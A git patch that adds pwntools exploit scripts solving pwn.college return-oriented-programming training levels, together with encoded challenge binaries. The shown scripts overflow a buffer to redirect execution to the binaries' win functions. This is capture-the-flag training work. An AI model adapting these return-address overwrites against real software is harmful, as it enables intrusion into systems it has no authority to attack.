From 38ba27e986bb1d0dd27ce3a3f5425a423561e05c Mon Sep 17 00:00:00 2001 From: jc Date: Tue, 5 Aug 2025 17:55:58 +0300 Subject: [PATCH] binary --- pwn_college/babyrop_level_1.0/a.py | 20 +++++ .../babyrop_level_1.0/babyrop_level_1_0 | Bin 0 -> 30307 bytes pwn_college/babyrop_level_1.1/a.py | 16 ++++ .../babyrop_level_1.1/babyrop_level_1_1 | Bin 0 -> 21488 bytes pwn_college/babyrop_level_2.0/a.py | 21 ++++++ .../babyrop_level_2.0/babyrop_level_2_0 | Bin 0 -> 30235 bytes pwn_college/babyrop_level_2.1/a.py | 17 +++++ .../babyrop_level_2.1/babyrop_level_2_1 | Bin 0 -> 21352 bytes random_challs/echoooo/a.py | 69 ++++++++++++++++++ 9 files changed, 143 insertions(+) create mode 100644 pwn_college/babyrop_level_1.0/a.py create mode 100755 pwn_college/babyrop_level_1.0/babyrop_level_1_0 create mode 100644 pwn_college/babyrop_level_1.1/a.py create mode 100755 pwn_college/babyrop_level_1.1/babyrop_level_1_1 create mode 100644 pwn_college/babyrop_level_2.0/a.py create mode 100755 pwn_college/babyrop_level_2.0/babyrop_level_2_0 create mode 100644 pwn_college/babyrop_level_2.1/a.py create mode 100755 pwn_college/babyrop_level_2.1/babyrop_level_2_1 create mode 100644 random_challs/echoooo/a.py diff --git a/pwn_college/babyrop_level_1.0/a.py b/pwn_college/babyrop_level_1.0/a.py new file mode 100644 index 0000000..51c78c1 --- /dev/null +++ b/pwn_college/babyrop_level_1.0/a.py @@ -0,0 +1,20 @@ +#!/usr/bin/python3 + +from pwn import * + +""" +patchelf --replace-needed libcapstone.so.5 /usr/lib/x86_64-linux-gnu/libcapstone.so.4 babyrop_level_1_0 +""" + +context.binary = target = ELF("./babyrop_level_1_0", checksec=False) +r = process() + +# funcs +s = lambda a: r.sendline(a) + +# buf +buf = b"A"*120 +buf += p64(target.sym.win) +s(buf) + +r.interactive() \ No newline at end of file diff --git a/pwn_college/babyrop_level_1.0/babyrop_level_1_0 b/pwn_college/babyrop_level_1.0/babyrop_level_1_0 new file mode 100755 index 0000000000000000000000000000000000000000..d3f4927224907cb39315e68b976f12b05da141b5 GIT binary patch literal 30307 zcmeHQe{dVsoqw|9#0|lA0)YUf*^mTmNEF%mfeGUxC04SgPGX!G%C9JEX>DsFOGa7| znrF}T4v}>3z?htuFO%$(K~Pm5V&be=p9V%D8)cZJGWKOgrNF!(hr~ByeMw%F zSR<=uLAH>6iOmEu1D_zT0Uf)B=M>e;MTMf3lJB}-TQQRTys1Vql5a(F(jJpEFiS8h z%A_EXmvV|~Qch9TzO88ApCYI1y&~)ztC}Fa@c^{rD%T#~j?o z*PMFD4dSCjI-Jd+uA_Q!oM~*2uZ9su`s*&f?~C0XhKv#bSK5m5JQqgAo)Y-x68Q5a z@P-n&Q34+>fe)0xe^>&4v;n(?6(qZc^<}LLeMNhWG|O1Ac#`#{<4LOvTFrDinTjM*QNxO-k}Pc+ zF=9z&E!G=PMpJ2%b(@x%jRQ8V+dH#es7^MzA+%nn5)|Pea zBMtrrxW6KsNz=i%0!LhA%_@2Lbtkg~I$OGm$H)8fBH%^9i+~paF9Kc!ya;#^@FL(v zz>9zv0WShx1iT1%5%415MZk-I7XdEnoQ-^h ziPx&=J;6=cTfENKT0$v3E_YwHd>M#94A3Ra14^@ogiFp0qQLC(QL?3*y z@(@>6Sp6R0$-+{4p1gV?BYt|8mrahpTPPGpc$p?XljE=3Wt#9zjvutkG|`zHf6^|~ z1ZQ&myLOo-Hk0Guw97Q1nH;~zF4IJ2a{M;COcR*Nal4y)FUP9#X43NV72b&l>$;Zc`E`RmHy@(-WBM0_lBBwXew{^||f@sKn z;dufIV_hSMy3R0HFATEhIR8B#agv+R4}Nrwe(+Se?t58({WEK>tznkb;FhQU+0*nP zd|}yhI`rJH^LLRVh(kLwr$1Xu|Uu5KC0)kNA%&QU*Jzf z^7Ank^x?BFxETHq&(}CveJLkReh}_gej(>-dW} z`x0ULQ240sJJLF|02Mo@R_KGHv#OtF&DBpI0mHS^GRzbVuYjR$T80Y2FbamsX&GjK zq5A1lsLwY|@eMAN^LjGy%Cz-m!oV09o|u-w#}yn!{Wqr8^Ex;;e<#%)e6L&|TD=3= z*5PHJh!|y$w)#E_Z4I@Dt_!u@a9ud}ZYXy&cMv^uEOZ`>*Rhe0mC9wH<9u$jL(bW7;gTMwxr05yBi`}_3a@R*)^;W;|@ zJWnUI{F9Kt*qsZ@kCO%;%Hz-QZVm6#b1wrwV0&~fc{BukDVso!{0)zgz93ZTx!1V; zTzFz|_XHcbB>(+C779ab@YI~_c~Engt>$OI$D6o~j(yNKrVnpIB(wWka<7KO!H|3X zS)ucA{vB}Zxo}<|+?{9Ddw)Wv4u?;Hu<;=((1082IE6S@V&Lh+ZS4Zu1n6BruOM;_ zqA7E1A6iJOOOn`zSATpVwdHXB25=xUS543Ln&he%T<7S6;Zr`ap3<)l=c~WgjpI`a z=Jnj0r0?(_3Wej>A`pKAQE_O!2^*h z^bPJlS$)@$=jjI`Uk^<5>fw9^e0kN;=O;Auc|MmthVbNv!pFF}MqAwmZv8a3zIZ5n zT7TGa4Cg77Lp%`A;GiE2pZ0;}>hQ5U-w=im{1=AW8EYe6@*?0xz>9zv0WShx1pXW% z;F$gmH{FKy=KPY$Lg6|3y~ix%P5@#S@*L1y#l!WC4OKjd?|VlFTJqx`)7%ZymQmD- z$X!YK23Vl6f;1HysdoSgmLH_uzp^9su@>#mAfVtIHj57$0>^xQ-JG&dV=>L%`aLh@fJKa=vgF+Ept44U;ECT*!T!Py}`A>dFzK2Jir5jUVq(5h7`4!;Eg-^=~t5G$ z|3b4y3Qg_>)N>yyp-D9PO|GtK1*v{STXJuPI$Cm{gtmopr#tlFZLRy1*0}Q3A41Q;Ps^=^ z^>0-#+(Qj(%}uuEK5EYWCR8~09ewbSPrvHz>~CrP>*ibOLNK&F6mhO8kUd%%Bg)s! z?3FUo<|QuzUIe@dcoFa-;6=cTfENKT0$v2X2>kg*z=vlgDP6Jre@dk}rmeYxH5-

0` zO=tS9pwg=TI^qp9^nac&hX$w&x3_O;U#syqQDw~D&V-rPx{P?jjA>R1p2n@Xk%-@6 z`q>$|wHmAK*t{v!))sEoHib8BX}__KEzM~7f3=1eQ&}u(BoeH)xn*l;>(=n5b*(pQ z+)kaw;AKxwzs6=$khC^>xm7&btu0N&v~DAY7g%MqRF~GirA@;-u;NM0u(YLp{@Lut zR94#+PcG7QGi_?|j5d(U!qbG&y_T&YB8Sv$O_*A%ZLnKG@88m_9+R_cFuOFfNIl!B zY0#Y3%&smoYQ=9iwQL3vh{wo8GG%FjMM5#>(|WTR3$aRrH!+~4vqEhK@7&Tl<4Geu zfQV_SbPOsGy&ePl$Sz*aMIu_CneL5eGI)JgMyh4g`Ae_%n(D9ccv}w~Lue8SGudrw z#F`=d0DsJ9jt{y>TKdNQX{(Dpb=18r*&nM=&Mu` z%PmYG+?(QVruJq`d{GQybm*bU;(cjX1Ec;`V~cticI|${DCEA=uyV9EX^Mk_2Dfn1 zc0`QNsFBoorD3~>E;%z^RKL)G$GA^%BN+^m82XXN#)!qzW+t-??dpj~d&o(=SuPC* z?&~sbDFzyyGBl&hqCtiT^B2ugeEAU(PvZ4)8eaa^Wu|f1ux&k%>@|&K2F%D(-}7jx z)(8RABuoQ?+cr>(99-<8ekLXkMy`&s`OEJ zH3}C+XJQQVm(y|M#X@!H_;xdD;&6@G4llyUMY!<4FJ)nX;k1PT2{+|wg@S?9YFd{e z6vj>y<35o}?WD-^$no>dB5gCIr5~m^f|Dt2moY%WfKTx*VI> zKiuF5KYUw|f3vED84iN1-r=a{pUc)&$)T`aRI?zbq6^ zff~Om6f~@QcZ?MZLC`~>J3x2j3xz$Pw~iMIkAb!xFBC>WD^EZlXg_GJe25>bl|1?G zXlK6u8s9~8W>t=Wrv@k<^I>D~VFhtC&#EB|>#poHunNMEmf+Kj&;Fx@LJj0tRn3N~ z1=m)ewX1RuyXL~Rm#s`+}^`m<-Y442*oFsY0SALu`kgq?*=j?Y1g(Rq5UuN3!Cjj4!`bX*cJ6rx+ zvxtG@=Roh#4+@1(k+Pn70p$Fug}!08V6@>tO_Qp8beiqP*v@^Ds5fW zf^}6j>#8bwzdQv!I`pVMAa}jwMZk-I7lHrp5vVyQ$U`tTPf$8lQ+izx`=^J_$CTy> zf*-sf&#AuwYg{bK7pVHpqKu~od7{TADd7=1o+@QM{fP=~ZAZ)&*iqMmrJhcTmkw5Er$F+df@4Ncjx$_0gg0lp_ z!pCNcvhsU}ICkVoLVl&sNN^vkMFE4$6APbuYWOK&eZ$&i}4vuyaZ!%HWL4v-n141?s~ z&M(FId2G7zUe3<9|4z7=A4hT9bapRb4^NAqd5?Or9(5KxgVOOogMC~$gNPh@1f#H; z^~v+Gs;`pxV=jD=#MSv*@n4CI4`(oc21*}(Cs@#&R%)bD}PL+{D=(bdQ_ah}fq zhdKX+Y)smnAr(C?adur$Akv{H72Ymz#a}8u^z4NX|T!_MvYA!=YLf~&wi=rh)d5; zO7Q<2cn$RLcg5`u&R@;Wmhs`&rfA{2CG^x2UN-eSGcNU9Fh9uS!>@sn`+W&Lv(a9P zzvhZt74UgnL-E(*68P#8_%`6wUiW#!;QZBWz82&L__Z=}J4@)f8@R?fi@)v%KDX=w z_LwW4-zFUY)cIB&Uw>Od|5F^VX6Ky~vDE(1}<$1F^p1}fY#OkG8Ig(}udt<~>k?usQ(?~>OSaZ!pjBG!{f?Hn#yK2Pz zje#}w(=$c7aGNAzq|?Sg1PhPp0oH|OZ8H+f_Vx}y#8HaS4V7Y6tT9KrV*ZAe_4TV5 ztvK`SN}i3-BEQwc5!zT}LwjgbI1=96jD1BS#kyiF(tP9Q(59C4#Wj3&7!dZhiG+2j zL2qtnk&Ufe)`eOlTQ+Ri8r~M!7FyRDCarvjkZ2~$Tg7l!BhrUeX)HvtOdPwJ^hMPE zB*CC_+mKFFxc4Y2<`8S|#Te~(QjG9TPl_SF3|tIFOj^+wd!t17!mYin3g0g!B35SQ z<|)Op(c2?xqm<$bx|dRnOxZ8RT}@ty?NrX(AYo$H6*p_qrZ5<6nN*|)i{4l+jda)M+k6)oxnE4NcC~R0-Bu~CiA1(-S}%v8y{(PfWTu#v`7;B(SQQ7g z(t`G=9BzS_=|1MiZ8p=74QBj(Y1m3z0}iM&8^;z<*wRLDh1Rt!w{WkIv-cR89_Eh? zBw<2OD=liUPER-4iV6|bAs_|`$Xs8-VtyVuKeGOe8D)OU><36kG?-F+l=;mbc?|c& zphT5~s5qE~gv!GL?t?*DcM7`jMe5-p4Ou@z&-^&8^x{eR>3VU zd3F7$_HEM?qoi*68-V{FYX-`HwN6qa8Ed7SS|@S)Z=jymNR+&~9&MEJrzp5c)JDoG zdCYKmisKtUMYg=UZVgC-Y8^&!pOIJP+mN9(5M^Io->UuRE|-kTf5oThU8tuu6;)Q( z!K0T7K~2iL{g*HsMuwWI@GnjlI@0YThXithgZ4%nRXnv~b1Jin(TRPpZ`nOF1)m%O^357bLW>Ax&tZX}YT zKSI%IU(K@u4T7%%Q%z@5ateDI8K=BjA81@JIMjNg;&-?IpQOC%KQ*sqZ9?LJ9avFT z@mKm@bjhpr2DPuC`yA!A{|lGAT9*jWfr<2rD}HYKzXT6m%hNH$le(_nE{bk`RaP_) zwrYHoyjtg|{G9S9Axj}r@@hRq?N>M^{ioxHlCrD%k>=~fqU6>4)g~guO>^nuq~sMX zgRoQHzHZ(j;AtX^uQ)&y)58 zE?mi9;lhFlP!o>y%0R%^IbIEOTH(u`I-X0{5 zwQ*4E8DryUTkJ5?IBMHJI+ad;40T!wO$M-kIOue$qqd@z>7^pZ6k4YO*YEf3`(Ac8 zchio4bUN+6o89mGe!f56d*6M#x9{!l`+9v-Ly^nHC>60y47u((GKY*kWBw-23apyV zW-=>hOW1Tkrokq22~s0R^sOR8K(s{Yxq+fx8D=<@Ep##G7$ZtGM2dEkNfudy?ww(< zM48v%(XJS?f@fYCIpAeZ&duY55hcA`d45CA{DwZ!&qVu(n(Z()-c5#`cbj2HG$QPd ziT0Bn!e}Q6J4x6PJtG1^l;Vjo!L3^Ot9Hx4A#YF#8AuY}GiJBjE9~|PeWG(<1=6|rbM)l<<^T~$%F&X-L1)^Y=^7nXs2YRk6W4366{Vstn$KVR@DAD*%Cr*DSi z!=GRJ`}3PZfgh(!53MF2SSIRVLVM9QIFI?+u%V98eu?$Dyd3iYcGHbdEbiPLqUHi( zO(>Xag*dme06wb#t`)$S6u@f>;8g|i)&ls$fJ?C1({=#zwd;-o_?`mzZGg{V3t3;Y z47thkq73qg587}B{h}SaK^5yx=}FwRM?xA)>fvadb!*YM-oX?_)wFm*i6z=YdNdJd zni>kDN+PARPE}V^(J)JNt8tc8^#g6G4v=YJlF+~u3s91JNYjJX=<$9 ztgQ8|^{oe;&aOmU=qOn0BHPc5pd9-T{w6PfsfE#NP^*Va85`d&^Bndux;7y2nF$Aj zT%vek|HuAGiQB93@@#(GeaOt`tkzu_kdnR~jv}A++8@GwE=W;yWuuY6TmE-Y7ZDQ=99FI3>6Jz(~c)UTK7z^ci zyfK{^+d(|kwuaZXj`8{ezuv}I*!Yz;{ze;4WC&qv*4){t(=@XvP@>#1ubB5k;iwW!&h4VFtm}e!DBse!x^l> zy*}?4LU_ooIgUW~Y{%e8$E0#;xy)YS`VU>;Bt0HHapCshiO<|Y*U8}PSM@nL4>N=Z zyFDJ?zM3wm3ro%09Za9g+z(+sS$sDjuKgoZ%0vB+9>+Z@4?4+-fD-{H0!{>+2sjaN zBH%>8iGULUCjw3coCy4nMqvL4jedgzH7~+5u*_qhWV5gEq5440Q2_X$JM#vh>Egv} z80#;-4)%`>_cms>0@%;er!u3E38qhii^p>ot$=0jh20~=r4K)aL;r!ABUr$fQF)-| z80Hs2{-cBa#Unn(UdBgl!GZN}LLPj|AW9eimX|onOZ@tZ%sUrEi7n`amv|cd7I^^>&Jur=m^k8K#h7=p=h9H9jeWQ{BeAgmpS_}8WcZU!Pqac*q3ph$~Z6(oweLu z@x3U;=2@llxfBZT-#Xq8HBG+;CSKl{nse{~H1j+-=Y_v&ny%^K^EZJ#O#?O0uVyT8 zXJh*Jf!&SiOMzX1^yS^bfr@7U-r0216`X_1B+f$xPh4^9<(2Q0miIv=SW|kUDSe?X z{pUb-{(HegBd*}Be@OiW=jZO;AJ`YzAGjx=nCEP;@8QfHQa-Pjo5@3OPI4mPM8JuF z69FdzP6V6?I1z9n;6&j6IRY;6w((twlyoo}Un&JvO_icasW*|*q>fmqa|2t0LkG}bjiQeaLo0ju2fQ&!ch%$W4)4=GTbKNby=w`8V_l`QZz0lv@p1Uaw8$|hvl{> zG&GUARjn(UOu`$tN#T~|t1rHdJGH(uS(6$%5RG>(Wy_Z@$4%O!#@Z8IP)5RN5@K5t ziEvx5ivC@T+_&uoif#SykJ;=IpwGOQ&5iBUGI?wrqz2^JyBfe@jp5}=&3$5 zV~a+rPJ#8~hC%g>lL@gI^?gd}SNcLW8g}A;)nB zCX!#enoS@-}J<6>K|79nT-0G6`#eZKU#4(JM+Zb4PWR=d2tUrlNT?|t^Z*4?`3qJ zTk$z?g34xy=iO{Bqwo67LN}Yo4vX*pt@!-hb;F7;$Xze2_;oB_|8=wLbKf&t_2H~+ zmdy~)yV(sak{6%+F5GP7W^`4XMDcu{#y-tXB1R6cmqo0U9i1avL^!2__*omiRN!>| zC8Jv)b4}7O6rW+PKaX8pYv^+$vCCJV*SKu{l>YD@;4U_`KV*cyy}h4v zd}{ynKtM8iTtewI1yV@B|>Z+#b zT}pc_5m%G2C`CA-bjA{Gp_mfZ6IxOUrFs}lpLfS#!Hcl3+F#|*ucUND<54A~X`x<4 zjq6%3>(D}7suE6hb@hUYiBmvRx2nRU38f?KTVGXO$?!P^=KMUT#MF4F9zkF&xM^q! zY^_)7x78^Ma27{lrqtcFEwHt5vsJ=Z;Q$C0XHn{d!b7mGg(+K_w$}!ll0pu|A1aB-SIbg7}EUicDFU#4g4Hj5SFZtcViB;HwZ4%TguKNsYFO;B4Z z3TphlgieJrYVrm@nKLhawEBYlh^2s^L>B3!{Jx+8#m!k?W4>%*TV{ zgRC#9wlklu_5g^d5GW=1QTC}3aneM>;Dk8C)Hr(#3(7+Yp{^)6>r8+z*r9uc4;{aO!Y6U3@O8*Z8H`?rJyzqb+SW2WQsNEjdA^IDP`KbOwZkcNi3Hw#T zj@GKN*FOYu9OIHbje}1M`v?XX61EYuWDj>VJVjxTs$@^&YQOlSdfHIS?S;D>e;?#< z3`_Pjo*5PPON1uXpY(`62yz?~6HnuwjIfu4y}kYdW&@DHn36q>k4i*=twNE?x3~X0 z!oF7M(Ksq13}_wzS&W(8{yD%fCgh)aW#Axr4PqY|*pL4aP&3<0!d?>gM-4Z*y@1I* z`+?1##&2hY;!w`g$k^@Czqx$6AL)i$B2237ri|dbrXsX#E%EzYA(O zb`z&tZX8AH%h~HoJkbo;mYVEo9;|E=fRISf;3j#(FM2xHX8YWDS~e^qWGE=v5uIhTr~CYfurE|Txt#;{ z=!@##*K8Q}2>T#b&Xgom9<$ep^8GfP>{r`xa%ZO0_spt4lnt&=1pY=~u?%WAU4L<(=?yGR}6^CZ3Z@${S(l~{SAxde;${+ zSGy-Z%{e`%J$GR5Kl9E1|MSm3bMKuycXa0~{-*UME*Ddwgx$(0<(cl~kT^0{6XQvV z)w4?GWpml**hC-`@bmH<(Ba#7Oi{g5WGGrL`L?{93X|+-4ONnnY|E3AD&=@>*nhtcVdNHv4V$)6u}2A0W>cJ8PHD>DHD_k!ee32g{>cwse}A%rhJm7f1@qpt2#{-TB91l1ia6IstJWzraDD;n3 zqFnw*q6!r;7gnY;096Z6(sLqLP|owjiZHs_%PFm0xsu1k;i3hfV!_qA2U=G{Yg|-N z>mCTFbuTK+lItO8nHjB-Q9-ldYAp@r)mU(~R)=tp1*f$;D%4wWDq97w1sCgbM2>F3 z<-}XTSP`#3bTn0x8`Aq;DL>AY z=T^Q0cr3S&){|GxWyDWwdD+;=+qqos08i6EXl&%9nWh2I*vK(6O#`2?k*CZw4S2>z z9yil8&>0)~Lo-bSoUxGy%`^>c#zyWp(=?zN8wr|e8pw=|Y%$X`@EaTPnQ0o(jE&Tq zX&L~Ijm$ICG_V;PnP#SGKr=StGSf7W85=qOsjM%&@#d}M4Gcu7{z(7Smj0nF{asu7 zJGS(2KK5e_>01&6Xapr601T_t?^DTe{1ZHmvE|4;nKk@6$8y=zXV0o3}Qe zI9j#9%k&e+4$UWW;`H@imaG1wHH=;0{o{DMyK?SV;X}p_JbM@eJADluQ!}0=h`QVr zFAs9^ar>SYChDlO`U7p%!-nHk;Jb)fy9ZjJJwL085>FBq`^togtR^| z^SgxU{r*$BYpAJz7BZHP&(QmhPO5yGHB>%51cvDa872ybK`@;EopGw6p-eCw1;bE5 zh6!M(eEK5tj}*)=<@r>=fr9xZqJUvA#0xUGxPnv2-#k8_=fSw@<&<~qol?DjWeuWD z14}*>K1!cza-H+F`dWNje9gCS@n_!lWlm*|p=E}yQI3D&5}e)liU(z!xdnRqj=J%YH`WX8%y-@9h@t!yuPk2ayB%fRVl1caQJhdylIw05$v2`up_(|FE8U`9-?+ zyhInY>@i57?@mL>Pml%|(j(9CX7%saGp_=F7P#mNGs&WU;0xI(Vq~xX0O|8Wm7e)g zwiOH+|7hQyQPz8X_8b3|%k{Iqi&N59LCs!M%@2W(tl?#B+Yf!i`oKnbGQGbs^O{eb z44IS93!NvjzXrFS@n`kEJy}-y)fcF!6aI@JY=r*cfOok5Z5QF^a&$a>pt(gr8v(ry zXb_&O6IGdF+R#W^sjFHfiEUuz`8iaV6WI=Mz%w@&=K7K3@(HdPdY}KI3#=FQTm0F| z-|fKpDFw57=5^9{;^SQI%opH@uR~P$^A$iR{1>PyXBPMSFX$nh6L7Ce6vl_;NneUv%K=wr%jbM!QGN#eR7|An6L&{4Sd^}H2 zQQ^z_vG;GIk;=)77#(N)7m1BjD7FOHXi$cM)xf|g3ZQXL=3k(o2RRx41v%;(c!)AF zNPG#VuK7pK~2H(ZS z$lwErSq;X>KeOjCJoaIrj?wnOnmFEEWaoej@i!=5LGjG6o+e+}bxP=kBA5HD$({GUpmH|L)7pd`s^; z?$U35GyOiz@7;YbJ?Q%G^98JPCR85H{1N5zg62#hX>)?(0mlQ52OJML9&kM1c);<1 z;{nG5|Cc@B!rDm+H!b~5p*TmuoSRrfFcs8ln*16*=(I?t+Imw)auI7y1w%VD^V?3l zwS~)TlNw0fa!zXNLFgq7+pT$e7J6z|MSHZGM6&xPO0DQwM7*B5p3icyXn;z8OUvdK zd=QPkM3pqU+M-56YY#@EMp#S5VQC~42}UEk47a7^)f%hWwrQiUx!K>KZS-&4+;Zn4 zwlJyT|1BCmOqF7xU^L2V8X8-Dt*!ozYn$%WcsYwS1}i%|do*?>IZ11#k6T4z9ooWZ zSnCLeJB(CPi??eno0~O!11l2Kf+=lbxBE)AtUVg+K>fFNMv{~jjT*5IL!+-?C1IwP zjCUCt_vR8U{(zBakH&W*1M2W0uF#GpS}+#YAVp|zJWZAB23I`Mr3HC$!4&biwXL0r zc)FugOHn~dBM~vkB4!quT*BpdMxs%z%?MGk-7vI09gX(Fb6t^WB$&{4MpC50&_eN8 z$mmY-N*SqiBBpJI%2*2iZBE2H62UHfwyR?vZ(C~L#+WGCEN=;^Nf=rXzdEW+2R8^M z#I*KwEJPmzOOn~f$YRE0OiILVKhD*gI3_S zlgll&jTxd-P~(y-sZOvhX(+2;5!Zp{Vt2yFpRQtd?8hv{+o*8SEuzz@|t$V&q7wi#mg;uNpl@D4h!8g2KybPsF?6Xq;8{4(`^dukcE8 z_0Supt^l3rEM!X3h_<_7Y48C$RoMLb^XaGEZbbR%2Z4o2oI!+bh{wZiy~aG|x~BA& z-6**NzdL@O%N+&nd?T0368%LkcM$X-=--2GdNY@!#p_$%%H?W6{cmI12=t#pJ3&7f z$>sKg{@MGv++ol!p2_6~L9fNsR2K9UXgO{hI%c?<#qGmfBk$VP!dyL7u4|@DDn9^T zOb_yJst&>y%ttcTFsX_#4}PbCl@W%p06#3JVh4Vf%T+;+RaC97nDvFq$veyUvD@aX zUc7w4^+0(!QP3XL(YgSicqx@(nlxsm6e`%!6IP``C#5J zbGZvtj^Zml!x^px^aK1pgl}S?W`2ob%AW03+`Py<~Ao(fKdv7+EdlGRo zzvORB`6bAIANfz^qQIA+P53mSD!=3(xjgysQRELIpZCP| z6;*#w(pWL;_e=d1+Q0;VMa`pS4Hce;C+ZdTeUmm+cw-gyz6y`8qGoM{wzgu{+KQ^R z73I9${uO#gp+~h5nd=0{1C9qA4>%t9|KWkE8D3tI;pu|XEr-IZf|$2hy01`}A_#8m zULK>R(-dZ51u%u#{D{LQFOOl>AP;n_q<|%KJe13Px?fUI`5%6oi&MJlG}fCVsC$p+ zJ&~rR;S}m+z8XKC7cf(QyEaRvt0h&WR7IM-JSK-P_{O!!P=D*E{+8})$?usY_!T}h zQKXgK+a;g+n>tlKUXAnm9FhE3+{n|)&v=2%)9QQcQqBJwQQsxE7wD1g>y@-w((RIV zOS(_e1Ckz+^oXQKB^{DuWXK8Jk zr)u}sdEA~A?z%++w@Z#sm!enim*2;?=9XeEM19vkA1`I<`}_I$1g5^PpO2TB{Wl+< zX!hHDd=gXrJ0CA+h5AJ)yMn3yl+S-9Q~fd@pUhPM&Bt*zt9Gztl(MNzD~MMxPl5I+ z#cmL4zX*#Od{@58ye{P9SbX5|S|J`UWz(7Zp1(D-6n~kkuPVfkvsGS4^7*Toy1wM& zSFu9i=sJ?eg-^z?H6!hSAff3bQUsx#q{Q>``25kNj$Y%(%K*ODzd>b3r<>&AzYe3k5Cg9hl z2ECz$1vWHoUh8WLY+k><)xR~c)wj0EPg?no9-(BKo66cS!QYLka?FmhWCUA|bO+QX zB3`d`n~yeR*f$c%=MWo;gl=w8Wq zpcB*dnBWdHZiWu{KafruVXCFv*`;CI#^yllR^PfWs@+-aO3jv}p2U*70xUs|6pjWG z27e!Dkaej@D9|0j)-JpO+mcCXGT+Wc?)Q?fS#3K*d(Y(OT=rodI>XkD>ttUwH>hFm zWN#N{?m<%tK|56puW5`#H*?4ER=|z@Vcgvbl#odETA;Rc1lu-6!V>bWZCr}CPmHs7 z29ur49qx^x2tiW`k%M;$N!r(jv&lpNd2mCJ1Z1o`nqqG5D>tIFC1cz;aFeZK5;+ z#;q4)SP|6o*M3|FDX4h>k-9t|pwjaZp=WO;ub$HmOL{vdFg+fedq{-a*X zUnJ)uP#r0%N$5v%5Rs9s(fX?s{fx#`L&WyJr8?s6u>^| zKawXIyZqz8h(+mVRbHeJJc8Jt@a*mX7}%`xnv~b1Jb&jURPke#j4S%LHhJ|N?x~fG z(ter37)S&~k05C+UyY|cb%O8RX;MHEC8yA*5wXgv`My~Vf$Yzb)le`>Am% zYZelNYQQHIDE}*cuh`_(Jb~H|aJOQV)L#CNZSrb9LI08vp!b^AU@!j{$fRd*dAYbe z?{J@xvh%C7qFJz2TIALIMEPfwzW`b4d#ZdjkD>M%9G3Re`9ndKtJ?7sV8o*2)pycH z1H?^Z=KP@K6)l0VRo>4!t@@_Twb9{MSC6%ru@620-t{|5Sc BdUOB) literal 0 HcmV?d00001 diff --git a/pwn_college/babyrop_level_2.1/a.py b/pwn_college/babyrop_level_2.1/a.py new file mode 100644 index 0000000..15b049b --- /dev/null +++ b/pwn_college/babyrop_level_2.1/a.py @@ -0,0 +1,17 @@ +#!/usr/bin/python3 + +from pwn import * + +context.binary = target = ELF("./babyrop_level_2_1", checksec=False) +r = process() + +# funcs +s = lambda a: r.sendline(a) + +# buf +buf = b"A"*88 +buf += p64(target.sym.win_stage_1) +buf += p64(target.sym.win_stage_2) +s(buf) + +r.interactive() \ No newline at end of file diff --git a/pwn_college/babyrop_level_2.1/babyrop_level_2_1 b/pwn_college/babyrop_level_2.1/babyrop_level_2_1 new file mode 100755 index 0000000000000000000000000000000000000000..4cadcbbcff1d240e11f89920f2983ea85b7a43f3 GIT binary patch literal 21352 zcmeHPeQX@X6`#AaV?&bj<%=F6As3RgNmO6XfrNv~WY6*0Yj6^i#3WS->$7idpE%!{ zyS)%2LXE=L)wsA4N~u&;MxwwUR86R8Q(C}jP!j$@36-iy{otd}o*_iWgf_HEw(rf( zyW3sgwN)$i54vORzIng*F|%)G*E@4N^UY{`i`(U5l-%qVhFr%yi9^PjvFC5&tiZx- zE|b_Yb}gF)NEI9smmoEAM9;Vl0nu8a=K+d#e#~$xS?ChZF-DYXh!pKgNfKFu`f3c8 zDDxRS+Ers#@XRM62fW0|qD7oAqNG_DH}XZ_ofTkOKV7nB8u-u-h&4i8c#;qF4r| z9Uo}%|D?PQvJ>$Pi+B=^8}1oVD(`l%!?^sriJE!4D6djGOt}n?LxE@tpK9IO$)MdP5EEhKZLv`BD1Z2s(RarVUfp^Q`&w&GVjO!1uVV93%a{*hk^zkKqoiVyxK&%M` z^Q{o)W>>)Ptbkuz0dJ^)-&g@(RRO=X0-gdq0Eay_0Z{I`8Y|#y0iVYfv%wAta;5(7 zhdkoLHk?8G_h55xWP>>^i>IFcScYY_cp}9HGl`Ve%Q9*#jz~JEv1C?N?`A#8bXH~Q zK{ds)s<}jPv*cI6Zl~$m5IO^yJYZk1u@FlZT5uzUWO)K3(MT1#f!t zJ4GH}?4~ClEb{n5H$8bzk;fO>>B$)JP`fR>cFl~}5BR8!Z?y3nY<#_qUuEN$+W18_ zey*8s__!^9`Yt*Do_yf_sg9j(Cnne`iODC9j;%y;;>{Hj(-&o6gnypL?^tiJZrMX{ zO^l5l!54A45zpF!BM4!WT=5zL`a8X2$9hZ3b;~67D%XGT94GlH`RKV#^3e+(*>zk# zeOa4V^iU%_*zK|Xh8y?eY(s8Ar=0(wa36&Ac=g?Yxb_^IQ6B1l^esH2@|csH2sjaN zBH%>8iGULUCjw3coCr7(a3bJDz=?npfiGSJ_8g<3zx?3Y0L=U3UpaeO*I(rm6{C$W z!cT;J%AxT7IbF|3FOEbnzKpX$Tp@p=Fbc4o|CN07!%ed5lzjTafeBYWdI8nY1*!Fd z+DP<*+;d7E9i4&#KtayG2@aCn@A;AFc`keyg>wG*Yd8f}sN-fAL2U!%#@_hnm8~vT z_D1e>MrGgmxI$&2VkfD}Mzvl7)$$eo1xWJI3KhPKn_-0?f}FX+2hI-W_rD%P(f?98%g$o*qPRS$a z2+&1TdCHKkK`F-HDt(Jfq41F{ zQ^n?60+UNn%whP+wQxHq@WS6PO@LwditK71ZOpD=EOJL%{x^}%w)|(2oss;-PIbNw1&1KGv?r_9jw&%h`$*EAR;HQj z6u}XOI*tQnUSEsXe{0?BduxZ;ro}g}y?*6&2xB=(I1Yi{7y=?;8Tiw@7p~#&b&!dA zeUG>|&z{%?Dt-oR*8)Vuoe>Sk}~ky)}g ze4wV)E2X^Qh&L4Ru5R)Mn!Nrdudm5l%j1~@KU3g`Vu$XW+2sjaN zBH%>8iNF^(0-^bmadCpekbozma|BQ8rfE%JEqvjO>1uw4@!3|1=dKYvezJ{eu|b$$ z$Z35y$v?ZSr%`3xBXLa{i}fI&uXiX)R4?j=x>p3Fy;rB1jQ#@hV$oYdpF5LXj z2(2r(7Z~zM9Fhd>5VT9sK|zNF9TRk1&_jaS{kCr2d~;xRXLl~8T zw&8*Gp+X<*8rv1GCrza~ibn-HLk{t!ua9RqXzITQ z8RB^lJgvIQ;-z)sW+M-yr&$Tb`?!jIqL&aOhtEkjt7Btg9}SXw1wLWJmkXTH^H&() zI(ip8H6Ii8#PTq;z~N#u<1+v_mRo#|qcWr+I9xExMbBjpic`7zSGumJxSs`V$$H7` 